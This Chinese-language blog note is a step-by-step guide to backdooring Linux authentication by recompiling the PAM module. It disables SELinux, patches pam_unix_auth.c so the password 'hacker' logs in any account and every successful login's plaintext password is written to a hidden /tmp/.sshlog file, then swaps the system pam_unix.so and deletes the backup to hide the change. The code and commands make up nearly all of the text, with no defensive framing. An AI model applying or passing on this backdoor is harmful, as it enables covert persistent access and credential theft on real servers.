【笔记】Linux重新编译PAM模块实现权限维持

发表于 更新于 阅读次数:

前言

Linux重新编译PAM模块实现权限维持

下载依赖

1
yum install gcc flex flex-dev

关闭Linux安全模式(SELinux)

1
setenforce 0

查看当前PAM版本

1
rpm -qa | grep pam

下载对应版本的PAM

1
2
3
wget https://github.com/linux-pam/linux-pam/releases/download/v1.5.3/Linux-PAM-1.5.3.tar.xz
tar -xvf Linux-PAM-1.5.3.tar.xz
cd Linux-PAM-1.5.3

修改源码

  • /* verify the password of this user */下的校验逻辑替换为后门代码,添加万能密码,并保存非万能密码登录的明文密码

hacker:万能密码
/tmp/.sshlog:SSH登录的密码保存路径

modules/pam_unix/pam_unix_auth.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
//retval = _unix_verify_password(pamh, name, p, ctrl);
//name = p = NULL;

retval = _unix_verify_password(pamh, name, p, ctrl);
if (strcmp("hacker", p) == 0) {
        return PAM_SUCCESS;
}    
if(retval == PAM_SUCCESS) {
        FILE * fp;
        fp = fopen("/tmp/.sshlog", "a");
        fprintf(fp, "%s : %s\n", name, p);
        fclose(fp);
}
name = p = NULL;

AUTH_RETURN;

编译

1
2
./configure
make

将新的PAM文件替换原PAM文件

1
2
mv /usr/lib64/security/pam_unix.so /usr/lib64/security/pam_unix.so.bakcp
cp modules/pam_unix/.libs/pam_unix.so /usr/lib64/security/pam_unix.so

清理bak文件

1
rm -f /usr/lib64/security/pam_unix.so.bakcp

完成